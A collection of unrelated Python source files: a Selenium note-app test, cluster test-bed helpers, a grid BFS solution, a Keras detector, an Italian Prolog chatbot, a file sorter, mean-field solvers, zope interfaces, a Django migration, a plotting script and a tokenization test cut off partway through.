    self.driver.refresh()
    time.sleep(2)
    folder = self._select_folder_by_name(folder_name)
    folder.click()
    time.sleep(2)
    note_data = self._create_note_without_ui(
        title = u"test_note",
        text = note_text,
        global_id = self._get_random_name(16),
        parent_id=folder_data["global_id"]
    )["body"]["notes"][0]
    time.sleep(4)
    folder.click()
    self.driver.refresh()
    time.sleep(2)
    button_click_on_first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
    button_click_on_first_note.click()
    time.sleep(4)
    # The shorthand 'margin' property reads back empty when not explicitly set.
    margine_none = self.driver.find_element_by_css_selector("#scrollbarNotesText .jspPane:first-child p:nth-last-child(1)")\
        .value_of_css_property("margin");
    self.assertEqual(margine_none, '');
    # Cleanup: delete the note through the UI, then the folder via the API.
    delete_note_button = self.driver.find_element_by_css_selector(".action_buttons.head_note a.trash")
    delete_note_button.click()
    time.sleep(1)
    confirmation_button = self.driver.find_element_by_css_selector("button.btn.btn-warning")
    confirmation_button.click()
    self._remove_item_without_ui(folder_data["global_id"])
|
import os
import subprocess
from backbone.nodes import node
from backbone.logger import logger
from backbone.report import report
from backbone.format import format
# Make imports of project modules resolve from the launch directory in any
# subprocesses spawned later.
os.environ["PYTHONPATH"] = os.getcwd()
import sys
import ast
def get_nodes_by_type(ty):
    """Return node objects from the test-bed spec whose 'type' matches *ty*.

    The test-bed is a Python literal (list of dicts) passed as ``sys.argv[1]``;
    matching is case-insensitive against each element's 'type' list.
    """
    # Renamed from 'list', which shadowed the builtin.
    matches = []
    for element in ast.literal_eval(sys.argv[1]):
        if ty.lower() in (t.lower() for t in element['type']):
            matches.append(node(element))
    return matches
def get_var(var):
    """Look up *var* (case-insensitively) in the dict literal from ``sys.argv[2]``.

    @param var: key name; lower-cased before the lookup.
    @return: the stored value, or None when the key is absent.
    """
    element = ast.literal_eval(sys.argv[2])
    # dict.get replaces the original try/except-KeyError with the same
    # behaviour: missing keys yield None.
    return element.get(var.lower())
#def create_node(hostname,
# Creating a logging here
#def logger():
# return logger.logger(sys.argv[0])
def smart_find_by_type(type):
    '''
    Find test-bed nodes by type using the available test bed.

    For 'namenode': return all namenodes when there are two or more,
    otherwise ask the single node for the cluster view.
    For 'psql'/'pgsql': locate the service through the master namenode.
    Returns None when nothing suitable is found.
    '''
    if type.lower() == 'namenode':
        nodes = get_nodes_by_type(type)
        if len(nodes) >= 2:
            return nodes
        # At most one node: return its cluster view (or fall through to None).
        for nd in nodes:
            return nd.cliCmd('show cluster global')
        return None
    if type.lower() in ['psql', 'pgsql']:
        # The psql service has to be located via the namenodes.
        nodes = get_nodes_by_type('namenode')
        if not nodes:
            return None
        master = [i for i in nodes if i.isMaster()][0]
        try:
            count = int(master.shellCmd('cli -m config -t \'show ru fu\' | grep -i \'parque\' | grep oozie | wc -l '))
        except (ValueError, TypeError):
            # BUG FIX: the original 'except ValueError,TypeError :' (Python 2
            # syntax) caught only ValueError, binding it to the name TypeError,
            # and then read the still-undefined 'count' -> NameError.
            count = 0
        if count > 0:
            pass  # TODO: the original never completed this branch
    return None
def userInput(req):
    '''
    Prompt the operator with *req* and return the reply without trailing
    whitespace.
    '''
    return raw_input('USERINPUT: %s ' % req).rstrip()
|
import sys
import os
# Redirect stdin to a local fixture so the contest solution can be run
# offline with a canned input file.
f = open("C:/Users/user/Documents/python/ant_re/import.txt","r")
sys.stdin = f
# -*- coding: utf-8 -*-
from queue import Queue
# Read an h x w character grid; 's' marks the start cell, 'g' the goal.
h,w = map(int,input().split())
c = [[0] * w for _ in range(h)]
sx,sy,gx,gy = 0,0,0,0
for i in range(h):
    c[i] = list(input())
    for j in range(w):
        if c[i][j] == "s":
            sx,sy = j,i
        elif c[i][j] == "g":
            gx,gy = j,i
def bfs():
    """Breadth-first search over the grid allowing up to 2 walls to be smashed.

    ``checked[y][x]`` holds the fewest '#' cells broken on any path found so
    far to (x, y); 3 is the "unvisited" sentinel. Queue items are [x, y].
    Sets the global ``ans`` to True once the goal is dequeued as reachable.
    """
    global que,checked,ans
    while not que.empty():
        xy = que.get()
        if xy[0] == gx and xy[1] == gy:
            ans = True
            return
        for i in range(-1,2):
            for j in range(-1,2):
                # Keep only the four orthogonal moves (skip diagonals and [0,0]).
                if i == j or i == -j:
                    continue
                if 0 <= xy[0] + i < w and 0 <= xy[1] + j < h:
                    if checked[xy[1] + j][xy[0] + i] != 0:
                        if c[xy[1] + j][xy[0] + i] != "#":
                            # Free cell: relax with the current wall count.
                            if checked[xy[1]][xy[0]] < checked[xy[1] + j][xy[0] + i]:
                                checked[xy[1] + j][xy[0] + i] = checked[xy[1]][xy[0]]
                                que.put([xy[0] + i,xy[1] + j])
                        else:
                            # Wall: may be smashed while fewer than 2 are broken so far.
                            if checked[xy[1]][xy[0]] < 2:
                                if checked[xy[1]][xy[0]] + 1 < checked[xy[1] + j][xy[0] + i] :
                                    checked[xy[1] + j][xy[0] + i] = checked[xy[1]][xy[0]] + 1
                                    que.put([xy[0] + i,xy[1] + j])
# Run the search from the start cell and report reachability.
que = Queue()
checked = [[3] * w for _ in range(h)]  # 3 = unvisited sentinel; at most 2 walls may be broken
ans = False
checked[sy][sx] = 0
# BUG FIX: bfs() reads queue items as [x, y]; the original seeded [sy, sx],
# swapping the start coordinates on non-diagonal starts.
que.put([sx,sy])
bfs()
if ans:
    print("YES")
else:
    print("NO")
|
import numpy as np
import pandas as pd
from tensorflow.keras.losses import binary_crossentropy, mse
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Dropout, Flatten, Dense, Activation, BatchNormalization, GlobalAveragePooling2D, Input, Concatenate
from tensorflow.keras.metrics import TruePositives, FalsePositives, FalseNegatives
from tensorflow.keras.optimizers import Adam
import tensorflow as tf
# Fixed input geometry for the detector network below.
IMG_HEIGHT = 64
IMG_WIDTH = 64
IMG_CHANNELS = 3
def custom_loss(y_true, y_pred):
    """Joint classification + box-regression loss for a single example.

    NOTE(review): the hard-coded reshape to [1, 5] assumes batch size 1 —
    confirm the training loop feeds one sample at a time.
    Layout is presumably [objectness, x1, y1, x2, y2] — verify with the
    data pipeline.
    """
    y_true = tf.reshape(y_true, [1, 5])
    y_pred = tf.reshape(y_pred, [1, 5])
    class_loss = binary_crossentropy(y_true[:, 0], y_pred[:, 0])
    # need make Euclidian distance loss here
    reg_loss = mse(y_true[:, 1:5], y_pred[:, 1:5])
    # NOTE(review): y_true[:, -1] is the last regression target (same as
    # y_true[:, 4]); using it as a weight on the class loss looks unintended —
    # confirm whether a separate objectness mask was meant.
    return class_loss * y_true[:, -1] + 2 * reg_loss
def make_model():
    """Build and compile a small CNN detector.

    Output is the concatenation of a 1-unit sigmoid objectness head and a
    4-unit linear box head (5 values total), trained with ``custom_loss``.
    """
    input_layer = Input(shape=[IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS])
    x = Conv2D(32, (3, 3), activation='relu')(input_layer)
    x = Conv2D(32, (3, 3), activation='relu')(x)
    x = MaxPooling2D(pool_size=(2, 2))(x)
    x = Conv2D(64, (3, 3), activation='relu')(x)
    x = MaxPooling2D(pool_size=(2, 2))(x)
    x = Flatten()(x)
    x = Dense(1000, activation='relu')(x)
    x = Dense(200, activation='relu')(x)
    out_1 = Dense(1, activation='sigmoid')(x)  # objectness probability
    out_2 = Dense(4, activation='linear')(x)   # box coordinates
    output_layer = Concatenate()([out_1, out_2])
    model = Model(input_layer, output_layer)
    model.compile(optimizer = Adam(learning_rate=0.0001), loss = custom_loss)
    return model
|
from PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton, QLineEdit, \
QListWidget, QListWidgetItem, QAbstractItemView, QMessageBox
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtCore import Qt as qtC
from pyswip import Prolog
import spacy
import nltk
import random
import sys
import signal
# Let Ctrl-C terminate the Qt application immediately.
signal.signal(signal.SIGINT, signal.SIG_DFL)
# TODO BONUS: fix the participants-list problem [PROLOG]
# TODO BONUS: add a speech synthesizer
# Load the knowledge base and the Italian spaCy pipeline once at import time.
prolog = Prolog()
prolog.consult('prolog/facts.pl')
prolog.consult('prolog/rules.pl')
nlp = spacy.load('it_core_news_lg')
# Tokens spaCy mis-tags for this corpus: treated as objects even when the
# tagger labels them VERB/ADJ/PRON/NUM.
noun_exeption = ["baciamano", "carlo"]
adj_exception = ["vecchio", "nuovo", "farnese"]
pron_exception = ["avancorpi"]
num_exception = ["due"]
# Canned Italian answer prefixes for who/when questions, plus fallbacks.
who_answer = ["È stato", "Certamente è stato", "Ovviamente è stato", "Senza dubbio è stato", "Come è noto, è stato",
              "Come è ben noto, è stato"]
when_answer = ["È successo nel", "È avvenuto nel", "È capitato nel"]
no_answer = ["Mi dispiace, non trovo una risposta", "Risposta non trovata", "Non so che dire"]
# Verb lemmas that signal a "where" question.
where_dict = ["trovare", "aprire", "collocare", "rinvenire", "conservare"]
# Italian verb synonyms used to match question verbs against stored facts.
dictionary = {
    "affrescare": ["dipingere", "decorare"],
    "realizzare": ["dipingere", "costruire", "eseguire", "scolpire"],
    "terminare": ["costruire", "edificare"],
    "cominciare": ["iniziare"],
    "iniziare": ["cominciare"],
    "sottoporre": ["presentare", "proporre"],
    "partecipare": ["aderire"],
    "opporre": ["rifiutare"],
    "restaurare": ["aggiustare", "ristrutturare", "risanare"],
    "giungere": ["arrivò"],
    "collocare": ["porre", "posizionare", "mettere", "situare", "sistemare"],
    "rinvenire": ["trovare", "recuperare", "scoprire"],
    "conservare": ["custodire", "trovare", "porre"],
    "trovare": ["situato", "porre", "collocare"]
}
def resolve_query(nlp_text, query, type='other'):
    """Match a parsed Italian question against the Prolog knowledge base.

    :param nlp_text: spaCy Doc of the user's question.
    :param query: Prolog query string with X/Y/Z variables.
    :param type: 'where' for location questions, anything else for who/when.
    :return: the best-matching answer string, or "" when nothing matches.
    """
    # Split the question into its verbs (lemmatised) and its object words.
    verb_question = []
    obj = []
    for token in nlp_text:
        if token.pos_ == "VERB":
            if token.text not in noun_exeption:
                verb_question.append(token.lemma_)
            else:
                obj.append(token.text)
        elif token.pos_ == "NOUN":
            obj.append(token.text)
        elif token.pos_ == "ADJ" or token.pos_ == "PRON" or token.pos_ == "NUM":
            if token.text in adj_exception or token.text in pron_exception or token.text in num_exception:
                obj.append(token.text)
    obj = ' '.join(obj)
    min_obj = ""
    # Edit-distance thresholds: candidates scoring >= 25 are discarded.
    min_where = 25
    min_who_when = 25
    for ans in prolog.query(query):
        if type == "where":
            # Location answers combine all three bound variables into a phrase.
            for verb in verb_question:
                if verb in where_dict:
                    obj_ = ans['X'].decode('utf-8')
                    min_local = nltk.edit_distance(obj_, obj)
                    # print(min_local, ans['Z'].decode('utf-8'))
                    if min_local < min_where:
                        min_where = min_local
                        min_obj = ans['X'].decode('utf-8') + " si trova " + ans['Y'].decode('utf-8') + " " + ans[
                            'Z'].decode('utf-8')
        else:
            # Who/when: the fact's verb (Y) must match a question verb, either
            # directly or through the synonym dictionary.
            verb = nlp(ans['Y'].decode('utf-8'))
            for v in verb:
                if v.pos_ == "VERB":
                    for vq in verb_question:
                        try:
                            if vq == v.lemma_ or vq in dictionary[v.lemma_]:
                                min_local = nltk.edit_distance(obj, ans['Z'].decode('utf-8').lower())
                                # print(min_local, ans['X'].decode('utf-8'))
                                if min_local < min_who_when:
                                    min_who_when = min_local
                                    min_obj = ans['X'].decode('utf-8')
                        except:
                            # NOTE(review): bare except silences KeyError from the
                            # synonym dictionary but also any other error — narrow it.
                            pass
    return min_obj
class App(QMainWindow):
    """Main window of the Donato chatbot: a log list, a question box and a
    send button that routes questions to the Prolog knowledge base."""
    def __init__(self):
        super().__init__()
        self.title = 'Donato Chatbot'
        self.left = 100
        self.top = 100
        self.width = 600
        self.height = 300
        self.thread = None
        self.threadMain = None
        self.initUI()
    def initUI(self):
        """Build the fixed-size UI: question textbox, send button, log list."""
        self.setWindowTitle(self.title)
        self.setFixedSize(self.width, self.height)
        self.setGeometry(self.left, self.top, self.width, self.height)
        self.textbox = QLineEdit(self)
        self.textbox.move(10, 250)
        self.textbox.resize(500, 32)
        self.textbox.setPlaceholderText("Fammi una domanda ...")
        # Button send message
        self.button = QPushButton('Invia', self)
        self.button.move(515, 250)
        self.button.resize(75, 32)
        # Logger
        self.list_widget = QListWidget(self)
        self.list_widget.resize(580, 230)
        self.list_widget.move(10, 10)
        # connect button to function on_click
        self.button.clicked.connect(self.on_click)
        self.show()
    @pyqtSlot()
    def on_click(self):
        """Dispatch the typed question: 'chi' -> who, 'quando' -> when,
        'dove' -> where; log both question and answer in the list widget."""
        question = self.textbox.text().lower()
        if question == "":
            QMessageBox.about(self, "Error", "La domanda non può essere vuota!")
        else:
            nlp_text = nlp(question)
            nlp_arr = []
            [nlp_arr.append(token.text) for token in nlp_text]
            item = QListWidgetItem('[UTENTE] ' + question)
            item.setForeground(qtC.red)
            self.list_widget.addItem(item)
            QAbstractItemView.scrollToBottom(self.list_widget)
            if "chi" in nlp_arr:
                result = resolve_query(nlp_text, 'query_who_what(X,Y,Z)')
                if result != "":
                    self.list_widget.addItem(QListWidgetItem('[DONATO] {verb} {who}'.format(verb=random.choice(who_answer), who=result)))
                    QAbstractItemView.scrollToBottom(self.list_widget)
                else:
                    self.list_widget.addItem(
                        QListWidgetItem('[DONATO] {result}'.format(result=random.choice(no_answer))))
                    QAbstractItemView.scrollToBottom(self.list_widget)
            elif "quando" in nlp_arr:
                result = resolve_query(nlp_text, 'query_when(Z,Y,X)')
                if result != "":
                    self.list_widget.addItem(
                        QListWidgetItem('[DONATO] {verb} {when}'.format(verb=random.choice(when_answer), when=result)))
                    QAbstractItemView.scrollToBottom(self.list_widget)
                else:
                    self.list_widget.addItem(
                        QListWidgetItem('[DONATO] {result}'.format(result=random.choice(no_answer))))
                    QAbstractItemView.scrollToBottom(self.list_widget)
            elif "dove" in nlp_arr:
                result = resolve_query(nlp_text, 'query_where(X,Y,Z)', 'where')
                if result != "":
                    self.list_widget.addItem(
                        QListWidgetItem('[DONATO] {result}'.format(result=result)))
                    QAbstractItemView.scrollToBottom(self.list_widget)
                else:
                    self.list_widget.addItem(
                        QListWidgetItem('[DONATO] {result}'.format(result=random.choice(no_answer))))
                    QAbstractItemView.scrollToBottom(self.list_widget)
            else:
                self.list_widget.addItem(
                    QListWidgetItem('[DONATO] Non ho capito, puoi ripetere?'))
                QAbstractItemView.scrollToBottom(self.list_widget)
            # Clear the input field for the next question.
            self.textbox.setText("")
if __name__ == '__main__':
    # Start the Qt event loop and hand control to the chatbot window.
    app = QApplication(sys.argv)
    ex = App()
    sys.exit(app.exec_())
|
from PIL import Image
# Open the sample image and display it with the system's default viewer.
img=Image.open('sal.png')
img.show()
|
import shutil
import os

# Sort every file in the current directory into a subfolder named after its
# extension (e.g. report.pdf -> ./.pdf/report.pdf).
dirpath = os.getcwd()
files = os.listdir()

# Sort by extension so files of the same type become adjacent.
sort_files = sorted(files, key=lambda x: os.path.splitext(x)[1])

# Keep only entries that have an extension (directories here have none),
# and record the parallel list of extensions.
zz = [f for f in sort_files if os.path.splitext(f)[1] != '']
n = [os.path.splitext(f)[1] for f in zz]

# Distinct extensions in first-seen (sorted) order.
different_ext = []
for ext in n:
    if ext not in different_ext:
        different_ext.append(ext)

# BUG FIX: guard against an empty directory (the original indexed
# different_ext[0] unconditionally and raised IndexError).
if zz:
    yu = 0
    # Create the folder for the first extension and move the first file in.
    # BUG FIX: paths are built with os.path.join instead of hard-coded '\\'
    # separators, so the script also works outside Windows.
    try:
        os.mkdir(different_ext[yu])
        print('Made folder |%s| \n' %different_ext[yu])
        shutil.move(os.path.join(dirpath, zz[0]), os.path.join(dirpath, different_ext[yu]))
        print('Moved |%s| to new folder |%s|\n' %(zz[0],different_ext[yu]))
    except OSError:
        print('Folder |%s| exists, moving |%s| to |%s|...\n'%(different_ext[yu],zz[0],different_ext[yu]))
        shutil.move(os.path.join(dirpath, zz[0]), os.path.join(dirpath, different_ext[yu]))
    # Walk the remaining files; advance to the next folder whenever the
    # extension changes (the lists are sorted, so each extension is one run).
    for x in range(len(n) - 1):
        if n[x + 1] == n[x]:
            shutil.move(os.path.join(dirpath, zz[x + 1]), os.path.join(dirpath, different_ext[yu]))
            print('moved |%s| to |%s|\n' %(zz[x+1],different_ext[yu]))
        else:
            yu += 1
            try:
                os.mkdir(different_ext[yu])
                print('made NEW folder |%s|\n' %different_ext[yu])
                shutil.move(os.path.join(dirpath, zz[x + 1]), os.path.join(dirpath, different_ext[yu]))
                print('moved |%s| to NEW folder |%s|\n' %(zz[x+1],different_ext[yu]))
            except OSError:
                print('Folder |%s| EXISTS, moving |%s| to |%s| \n' %(different_ext[yu],zz[x+1],different_ext[yu]))
                shutil.move(os.path.join(dirpath, zz[x + 1]), os.path.join(dirpath, different_ext[yu]))
                print('moved |%s| to |%s|\n' %(zz[x+1],different_ext[yu]))
|
def prefill(n, v=None):
    """Return a list of *v* repeated int(n) times.

    Raises TypeError('<n> is invalid') when n cannot be converted to int.
    """
    try:
        size = int(n)
    except (TypeError, ValueError):
        raise TypeError('{} is invalid'.format(n))
    return [v] * size
|
class A:
    """Small demo class: class-level defaults overridden per instance."""

    # Class-level defaults; __init__ shadows name and age on the instance.
    name = None
    age = None
    height = None

    def __init__(self):
        self.name = 'test'
        self.age = 2

    def func(self):
        # height stays the class default unless a caller sets it.
        print(self.height)

    def func_2(self):
        value = 888
        self.to_be_defined(value)

    def to_be_defined(self, a):
        # Extension hook; intentionally a no-op in the base class.
        pass
|
def hello():
    """Print a greeting to stdout."""
    greeting = "hello"
    print(greeting)
|
def factorial(n):
    """Return n! for n >= 0; None for negative n (0! == 1)."""
    if n < 0:
        return None
    result = 1
    for k in range(2, n + 1):
        result *= k
    return result
'''
In mathematics, the factorial of integer 'n' is written as 'n!'. It is equal to
the product of n and every integer preceding it. For example: 5! = 1 x 2 x 3 x 4 x 5 = 120
Your mission is simple: write a function that takes an integer 'n' and returns 'n!'.
You are guaranteed an integer argument. For any values outside the positive range,
return null, nil or None .
Note: 0! is always equal to 1. Negative values should return null;
'''
|
# Francesca Mastrogiuseppe 2018
import numpy as np
import scipy
import matplotlib.pyplot as plt
from dsn.util.fct_integrals import *
#### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####
### Solve mean-field equations
### Non-trivial solutions, solved through iteration
def SolveStatic(
    y0, g, VecPar, eps, tolerance=1e-10, backwards=1
):  # y[0]=mu, y[1]=Delta0
    """Iterate the static mean-field equations to a fixed point.

    :param y0: initial [mu, Delta0, kappa] guess.
    :param g: random-connectivity strength.
    :param VecPar: (Mm, Mn, Mi, Sim, Sin, Sini, Sip) structure parameters.
    :param eps: iteration step size (relaxation factor).
    :param tolerance: relative/absolute convergence threshold.
    :param backwards: set to -1 to invert the kappa flow and reach
        unstable solutions.
    :return: (ys, count) — the iterate history as an array and the number
        of steps taken; diverged/NaN runs end with [0, 0, 0].
    """
    # The variable y contains the mean-field variables mu, delta0 and K
    # Note that, for simplicity, only delta0 and one first-order statistics (kappa) get iterated
    # The variable backwards can be set to (-1) to invert the flow of iteration and reach unstable solutions
    again = 1
    y = np.array(y0)
    y_new = np.ones(3)
    Mm, Mn, Mi, Sim, Sin, Sini, Sip = VecPar
    Sii = np.sqrt((Sini / Sin) ** 2 + Sip ** 2)
    count = 1
    ys = []
    while again == 1:
        ys.append(y.copy())
        # Take a step
        mu = Mm * y[2] + Mi
        new1 = g * g * PhiSq(mu, y[1]) + Sim ** 2 * y[2] ** 2 + Sii ** 2
        new2 = Mn * Phi(mu, y[1]) + Sini * Prime(mu, y[1])
        y_new[0] = Mm * new2 + Mi
        y_new[1] = (1 - eps) * y[1] + eps * new1
        y_new[2] = (1 - backwards * eps) * y[2] + backwards * eps * new2
        # Stop if the variables converge to a number, or zero
        # If it becomes nan, or explodes
        if np.fabs(y[1] - y_new[1]) < tolerance * np.fabs(y[1]) and np.fabs(
            y[2] - y_new[2]
        ) < tolerance * np.fabs(y[2]):
            again = 0
        if (
            np.fabs(y[1] - y_new[1]) < tolerance
            and np.fabs(y[2] - y_new[2]) < tolerance
        ):
            again = 0
        if np.isnan(y_new[0]) == True:
            again = 0
            y_new = [0, 0, 0]
        if np.fabs(y[2]) > 1 / tolerance:
            again = 0
            y_new = [0, 0, 0]
        y[0] = y_new[0]
        y[1] = y_new[1]
        y[2] = y_new[2]
        count += 1
    ys = np.array(ys)
    return ys, count
def SolveStatic2(
    y0, g, rho, VecPar, eps, tolerance=1e-10, backwards=1
):  # y[0]=mu, y[1]=Delta0
    """Variant of SolveStatic that additionally accepts a correlation *rho*.

    NOTE(review): the rho term is commented out below, so rho is currently
    unused and this function behaves identically to SolveStatic — confirm
    whether the rho coupling should be restored.

    :return: (ys, count) — iterate history and step count; diverged/NaN
        runs end with [0, 0, 0].
    """
    # The variable y contains the mean-field variables mu, delta0 and K
    # Note that, for simplicity, only delta0 and one first-order statistics (kappa) get iterated
    # The variable backwards can be set to (-1) to invert the flow of iteration and reach unstable solutions
    again = 1
    y = np.array(y0)
    y_new = np.ones(3)
    Mm, Mn, Mi, Sim, Sin, Sini, Sip = VecPar
    Sii = np.sqrt((Sini / Sin) ** 2 + Sip ** 2)
    count = 1
    ys = []
    while again == 1:
        ys.append(y.copy())
        # Take a step
        mu = Mm * y[2] + Mi
        new1 = g * g * PhiSq(mu, y[1]) + Sim ** 2 * y[2] ** 2 + Sii ** 2
        new2 = Mn * Phi(mu, y[1]) + Sini * Prime(mu, y[1])
        # + rho*Sim*Sin*y[2] * Prime(mu, y[1])
        y_new[0] = Mm * new2 + Mi
        y_new[1] = (1 - eps) * y[1] + eps * new1
        y_new[2] = (1 - backwards * eps) * y[2] + backwards * eps * new2
        # Stop if the variables converge to a number, or zero
        # If it becomes nan, or explodes
        if np.fabs(y[1] - y_new[1]) < tolerance * np.fabs(y[1]) and np.fabs(
            y[2] - y_new[2]
        ) < tolerance * np.fabs(y[2]):
            again = 0
        if (
            np.fabs(y[1] - y_new[1]) < tolerance
            and np.fabs(y[2] - y_new[2]) < tolerance
        ):
            again = 0
        if np.isnan(y_new[0]) == True:
            again = 0
            y_new = [0, 0, 0]
        if np.fabs(y[2]) > 1 / tolerance:
            again = 0
            y_new = [0, 0, 0]
        y[0] = y_new[0]
        y[1] = y_new[1]
        y[2] = y_new[2]
        count += 1
    ys = np.array(ys)
    return ys, count
|
# Copyright 2009-2010, BlueDynamics Alliance - http://bluedynamics.com
from zope.interface import (
Interface,
Attribute,
)
class ISoupAnnotatable(Interface):
    """Marker for persisting soup data.

    A marker interface: it declares no methods or attributes.
    """
class ISoup(Interface):
    """The Container Interface.

    A soup holds records and exposes catalog-backed querying over them.
    """
    id = Attribute(u"The id of this Soup")
    nextrecordindex = Attribute(u"The next record index to use.")

    def add(record):
        """Add record to soup.
        @param record: IRecord implementation
        @return: intid for record
        """

    def query(**kw):
        """Query Soup for Records.
        @param kw: Keyword arguments defining the query
        @return: list of records
        """

    # Fix: interface methods are declared with the caller's signature and do
    # not take `self` (matching add/query/reindex/__delitem__ above).
    def rebuild():
        """Replace the catalog and reindex all records.
        """

    def reindex(record=None):
        """Reindex the catalog for this soup.
        If record is None reindex all records, otherwise a list of records is
        expected.
        """

    def __delitem__(record):
        """Delete Record from soup.
        If given record not contained in soup, raise ValueError.
        @param record: IRecord implementation
        @raise: ValueError if record not exists in this soup.
        """
class IRecord(Interface):
    """The record Interface.

    A single item stored in a soup; `data` carries the payload that the
    catalog indexes.
    """
    id = Attribute(u"The id of this Record")
    intid = Attribute("The intid of this record. No longint!")
    data = Attribute(u"Dict like object representing the Record Data")
class ICatalogFactory(Interface):
    """Factory for the catalog used for Soup.
    """
    def __call__():
        """Create and return the Catalog.
        @return: zope.app.catalog.catalog.Catalog instance
        """
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Create Accomodation, Bed and Room models and attach guests to beds."""
    dependencies = [
        ('core', '0003_remove_guest_email'),
    ]
    operations = [
        migrations.CreateModel(
            name='Accomodation',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('address', models.CharField(max_length=255)),
                ('name', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='Bed',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                # NOTE(review): max_length=2 cannot hold the default b'single'
                # nor the stored choice values b'double'/b'single' (6 chars);
                # the pairs also look reversed -- b'do'/b'si' appear to be the
                # intended stored codes. Confirm and repair in a follow-up
                # migration rather than editing this historical one.
                ('type', models.CharField(default=b'single', max_length=2, choices=[(b'double', b'do'), (b'single', b'si')])),
                ('is_sofa_bed', models.BooleanField(default=False)),
            ],
        ),
        migrations.CreateModel(
            name='Room',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('accomodation', models.ForeignKey(to='core.Accomodation')),
            ],
        ),
        migrations.AddField(
            model_name='bed',
            name='room',
            field=models.ForeignKey(to='core.Room'),
        ),
        # Guest keeps its bed nullable so deleting a bed detaches the guest.
        migrations.AddField(
            model_name='guest',
            name='bed',
            field=models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, blank=True, to='core.Bed', null=True),
        ),
    ]
|
import matplotlib.pyplot as plt
# Plot per-speaker precision/recall from the vowel-evaluation CSV.
# Fixes: file handle now closed via `with`; precision converted to float
# (it was left as strings while recall was converted, which breaks the
# scatter/vlines calls below).
# NOTE(review): hard-coded absolute Windows path -- consider a CLI argument.
with open('F:\Projects\Active Projects\Project Intern_IITB\Vowel Evaluation (Speaker Wise Data)\\Vowel_Evaluation_V5_Speaker_Based.csv', 'r') as speaker_results:
    sr = speaker_results.read()
list_data = sr.split('\n')
list_data.pop(0)   # drop header row
list_data.pop(-1)  # drop two trailing footer/blank lines
list_data.pop(-1)
data = [row.split(',') for row in list_data]
# Columns: 0=name, 1=precision, 2=recall, 3=number of files.
name = [row[0] for row in data]
precision = [float(row[1]) for row in data]  # bug fix: was appended as str
recall = [float(row[2]) for row in data]
no_of_files = [row[3] for row in data]
# Offset the recall markers slightly so both series stay visible.
axis_p = [j for j in range(len(name))]
axis_r = [j + 0.1 for j in range(len(name))]
plt.scatter(axis_p, precision, color='red', label='Precision')
plt.scatter(axis_r, recall, color='blue', label='Recall')
# Stems from zero up to each marker.
for j in range(len(axis_p)):
    plt.vlines(axis_p[j], 0, precision[j])
for j in range(len(axis_r)):
    plt.vlines(axis_r[j], 0, recall[j])
plt.xlabel('Speaker No')
plt.ylabel('Precision and Recall')
# Annotate each point with the speaker's file count.
for j in range(len(axis_p)):
    plt.text(axis_p[j] + 0.01, recall[j] + 0.01, str(no_of_files[j]), fontsize='10')
plt.xlim(-0.5, len(axis_r) + 0.5)
plt.ylim(0, 1.1)
plt.hlines(0.8, 0, len(axis_r))  # reference line at 80%
plt.legend(loc="upper left", bbox_to_anchor=(1, 1))
plt.show()
|
/home/joey/Documents/robots/solveRobots.py
|
from collections import OrderedDict
from unittest import TestCase
from pyjsonnlp.tokenization import ConllToken, segment, surface_string, subtract_tokens
test_text = """That fall, two federal agencies jointly announced that the Russian government "didn't direct recent compromises of e-mails from US persons and institutions, including US political organizations," and, " [t]hese thefts and disclosures are intended to interfere with the US election process." After the election, in late December 2016, the United States imposed sanctions on Russia for having interfered in the election. By early 2017, several congressional committees were examining Russia's interference in the election."""
class TestTokenization(TestCase):
    """Exercises ConllToken, segment, surface_string and subtract_tokens."""

    def test_conll_token(self):
        # A freshly built token exposes its value, spacing and offset,
        # and space_after starts out unset but is writable.
        token = ConllToken(space_prefix=' ', value='test', offset=10)
        assert 'test' == token.value, token.value
        assert ' ' == token.spacing, token.spacing
        assert 10 == token.offset, token.offset
        assert not token.space_after
        token.space_after = True
        assert token.space_after

    def test_segment(self):
        # Flatten all sentences into one token stream, then compare the
        # token values and their trailing-space flags against the fixtures.
        tokens = [tok for sent in segment(test_text) for tok in sent]
        words = [tok.value for tok in tokens]
        spaces = [tok.space_after for tok in tokens]
        expected_words = ['That', 'fall', ',', 'two', 'federal', 'agencies', 'jointly', 'announced', 'that', 'the', 'Russian', 'government', '"', 'did', 'not', 'direct', 'recent', 'compromises', 'of', 'e', 'mails', 'from', 'US', 'persons', 'and', 'institutions', ',', 'including', 'US', 'political', 'organizations', ',', '"', 'and', ',', '"', '[', 't', ']', 'hese', 'thefts', 'and', 'disclosures', 'are', 'intended', 'to', 'interfere', 'with', 'the', 'US', 'election', 'process', '.', '"', 'After', 'the', 'election', ',', 'in', 'late', 'December', '2016', ',', 'the', 'United', 'States', 'imposed', 'sanctions', 'on', 'Russia', 'for', 'having', 'interfered', 'in', 'the', 'election', '.', 'By', 'early', '2017', ',', 'several', 'congressional', 'committees', 'were', 'examining', 'Russia', "'s", 'interference', 'in', 'the', 'election', '.']
        expected_spaces = [True, False, True, True, True, True, True, True, True, True, True, True, False, False, True, True, True, True, True, False, True, True, True, True, True, False, True, True, True, True, False, False, True, False, True, True, False, False, False, True, True, True, True, True, True, True, True, True, True, True, True, False, False, False, True, True, False, True, True, True, True, False, True, True, True, True, True, True, True, True, True, True, True, True, True, False, False, True, True, False, True, True, True, True, True, True, False, True, True, True, True, False, False]
        assert expected_spaces == spaces, spaces
        assert expected_words == words, words

    def test_surface_string(self):
        # Reassemble a detokenized sentence; SpaceAfter metadata controls
        # whether a space is inserted after each token.
        sentence = [
            OrderedDict({'text': 'I', 'misc': {'SpaceAfter': 'No'}}),
            OrderedDict({'text': "'m", 'misc': {'SpaceAfter': 'Yes'}}),
            OrderedDict({'text': 'sending', 'misc': {'SpaceAfter': 'Yes'}}),
